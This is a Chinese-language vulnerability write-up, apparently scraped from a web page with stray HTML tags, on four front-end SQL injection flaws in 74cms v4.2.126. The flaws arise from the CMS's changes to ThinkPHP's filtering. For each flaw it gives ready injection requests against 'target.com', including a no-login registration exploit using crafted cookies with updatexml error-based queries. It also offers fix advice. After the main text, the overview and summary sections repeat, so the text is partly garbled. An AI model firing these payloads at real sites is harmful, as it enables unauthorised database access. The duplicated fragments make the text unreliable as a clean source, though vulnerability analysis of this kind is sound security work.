74cms v4.2.126 前台SQL注入漏洞分析<\/h1>

漏洞概述<\/h2>
74cms v4.2.126版本存在多处前台SQL注入漏洞，这些漏洞源于系统对ThinkPHP框架的修改导致的安全问题。攻击者可以利用这些漏洞在未授权或普通用户权限下执行任意SQL语句，获取数据库敏感信息。<\/p>

环境准备<\/h2>

下载74cms基础版安装包<\/li>
安装系统<\/li>

如需本地升级，修改文件解决域名问题：

文件路径：74cms\upload\Application\Admin\Controller\ApplyController.class.php<\/code><\/li>

将所有$_SERVER['HTTP_HOST']<\/code>改为http:\/\/baidu.com<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
漏洞原理<\/h2>
框架修改引入的安全问题<\/h3>
74cms基于ThinkPHP 3.2.3重构，但修改了框架底层，在Driver.class.php<\/code>中新增了三个方法：<\/p>

match<\/code><\/li>
match_mode<\/code><\/li>
match_with<\/code><\/li>
<\/ul>
这些方法可以绕过ThinkPHP的I函数过滤机制。<\/p>
I函数与过滤机制<\/h3>
ThinkPHP的I函数主要功能：<\/p>

确定数据类型<\/li>
对数据进行循环取值<\/li>
调用think_filter<\/code>函数进行过滤<\/li>
<\/ol>
think_filter<\/code>函数会在特定关键字后添加空格，如将in<\/code>变为in <\/code>，从而防止SQL注入。<\/p>
漏洞触发条件<\/h3>
当满足以下条件时，漏洞可利用：<\/p>

使用M()->where($test)->xx<\/code>形式<\/li>
where中任意参数可控<\/li>
参数不经过I函数过滤或不过滤双引号<\/li>
<\/ol>
漏洞位置与利用方式<\/h2>
第一处：company_focus 方法<\/h3>
文件路径<\/strong>：Application\/Home\/Controller\/AjaxPersonalController.class.php<\/code><\/p>
利用条件<\/strong>：<\/p>

需要普通用户登录<\/li>
<\/ul>
利用方式<\/strong>：<\/p>
http:\/\/target.com\/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a
<\/code><\/pre>
第二处：order_pay_finish 方法<\/h3>
文件路径<\/strong>：Application\/Home\/Controller\/CompanyServiceController.class.php<\/code><\/p>
利用条件<\/strong>：<\/p>

需要企业用户登录<\/li>
<\/ul>
利用方式<\/strong>：<\/p>
http:\/\/target.com\/index.php?m=&c=CompanyService&a=order_pay_finish&order_id[0]=match&order_id[1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a
<\/code><\/pre>
第三处：register 方法<\/h3>
文件路径<\/strong>：Application\/Home\/Controller\/MembersController.class.php<\/code><\/p>
利用条件<\/strong>：<\/p>

无需登录<\/li>
<\/ul>
利用方式<\/strong>：<\/p>
POST \/index.php?m=&c=Members&a=register HTTP\/1.1
Content-Type: application\/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: members_uc_info[reg_type]=1;members_uc_info[utype]=2;members_uc_info[mobile][0]=match;members_uc_info[mobile][1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a;

reg_type=2&utype=2&ucenter=bind&unbind_mobile=1
<\/code><\/pre>
参数说明<\/strong>：<\/p>

reg_type=2<\/code>：绕过注册判断<\/li>
utype=2<\/code>：设置会员类型<\/li>
ucenter=bind<\/code>：触发cookie合并到$data数组<\/li>
unbind_mobile=1<\/code>：满足流程判断<\/li>
<\/ul>
第四处：oauth_reg 方法<\/h3>
文件路径<\/strong>：Application\/Home\/Controller\/MembersController.class.php<\/code><\/p>
利用条件<\/strong>：<\/p>

需要普通用户或企业用户登录<\/li>
<\/ul>
利用方式<\/strong>：<\/p>
POST \/index.php?m=&c=Members&a=oauth_reg HTTP\/1.1
Cookie: members_bind_info[type][0]=match;members_bind_info[type][1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a;

username=合法账号&password=对应密码
<\/code><\/pre>
漏洞验证<\/h2>
可以使用以下Payload验证漏洞是否存在：<\/p>
updatexml(1<\/span>,concat(0<\/span>x7e,(select<\/span> user<\/span>())),0<\/span>)
<\/span><\/span><\/code><\/pre>如果返回包含数据库用户名的错误信息，则证明漏洞存在。<\/p>
修复建议<\/h2>

升级到最新版本<\/li>
对用户输入进行严格过滤，特别是双引号<\/li>
修改框架底层，确保新增方法也经过安全过滤<\/li>
对where条件中的参数进行类型检查<\/li>
<\/ol>
总结<\/h2>
这些漏洞源于74cms对ThinkPHP框架的修改不当，导致过滤机制被绕过。攻击者可以利用这些漏洞在无需高权限的情况下执行SQL注入攻击，获取敏感数据。建议用户及时升级或采取防护措施。<\/p>

74cms v4.2.126 前台SQL注入漏洞分析<\/h1>

漏洞概述<\/h2> 74cms v4.2.126版本存在多处前台SQL注入漏洞，这些漏洞源于系统对ThinkPHP框架的修改导致的安全问题。攻击者可以利用这些漏洞在未授权或普通用户权限下执行任意SQL语句，获取数据库敏感信息。<\/p>

漏洞原理<\/h2>

漏洞位置与利用方式<\/h2>

总结<\/h2> 这些漏洞源于74cms对ThinkPHP框架的修改不当，导致过滤机制被绕过。攻击者可以利用这些漏洞在无需高权限的情况下执行SQL注入攻击，获取敏感数据。建议用户及时升级或采取防护措施。<\/p>

漏洞概述<\/h2>
74cms v4.2.126版本存在多处前台SQL注入漏洞，这些漏洞源于系统对ThinkPHP框架的修改导致的安全问题。攻击者可以利用这些漏洞在未授权或普通用户权限下执行任意SQL语句，获取数据库敏感信息。<\/p>

总结<\/h2>
这些漏洞源于74cms对ThinkPHP框架的修改不当，导致过滤机制被绕过。攻击者可以利用这些漏洞在无需高权限的情况下执行SQL注入攻击，获取敏感数据。建议用户及时升级或采取防护措施。<\/p>